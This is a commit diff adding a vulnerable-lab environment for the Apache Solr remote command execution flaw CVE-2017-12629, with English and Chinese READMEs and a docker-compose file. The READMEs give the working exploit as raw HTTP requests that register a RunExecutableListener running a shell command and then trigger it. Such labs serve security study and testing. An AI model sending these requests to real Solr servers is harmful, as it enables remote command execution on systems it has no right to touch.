first commit

solr/CVE-2017-12629-RCE/README.md

@@ -0,0 +1,61 @@
+# Apache Solr Remote Command Execution (CVE-2017-12629)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. It is written in Java and built upon Apache Lucene. Before version 7.1.0, two vulnerabilities were discovered: XML External Entity (XXE) and Remote Command Execution (RCE), both numbered as CVE-2017-12629. These two vulnerabilities can be chained together to form an attack chain.
+
+This environment demonstrates the RCE vulnerability.
+
+References:
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 7.0.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`. No authentication is required.
+
+## Vulnerability Reproduction
+
+First, create a listener by setting the `exe` value to the command you want to execute and the `args` value to the command parameters:
+
+```
+POST /solr/demo/config HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 158
+
+{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
+```
+
+![](1.png)
+
+Then, trigger the listener by performing an update operation:
+
+```
+POST /solr/demo/update HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 15
+
+[{"id":"test"}]
+```
+
+![](2.png)
+
+Execute `docker compose exec solr bash` to enter the container, and you can see that `/tmp/success` has been successfully created:
+
+![](3.png)

solr/CVE-2017-12629-RCE/README.zh-cn.md

@@ -0,0 +1,59 @@
+# Apache Solr 远程命令执行漏洞（CVE-2017-12629）
+
+Apache Solr 是一个开源的搜索服务器。它使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。在 7.1.0 版本之前，发现了两个漏洞：XML 外部实体注入（XXE）和远程命令执行（RCE），这两个漏洞的编号均为 CVE-2017-12629。这两个漏洞可以连接成利用链。
+
+本环境演示远程命令执行漏洞。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 7.0.1 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理页面，无需登录。
+
+## 漏洞复现
+
+首先创建一个 listener，设置 `exe` 的值为我们想执行的命令，`args` 的值为命令参数：
+
+```
+POST /solr/demo/config HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 158
+
+{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
+```
+
+![](1.png)
+
+然后进行 update 操作，触发刚才添加的 listener：
+
+```
+POST /solr/demo/update HTTP/1.1
+Host: your-ip
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 15
+
+[{"id":"test"}]
+```
+
+![](2.png)
+
+执行 `docker compose exec solr bash` 进入容器，可以看到 `/tmp/success` 文件已成功创建：
+
+![](3.png)

solr/CVE-2017-12629-RCE/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:7.0.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"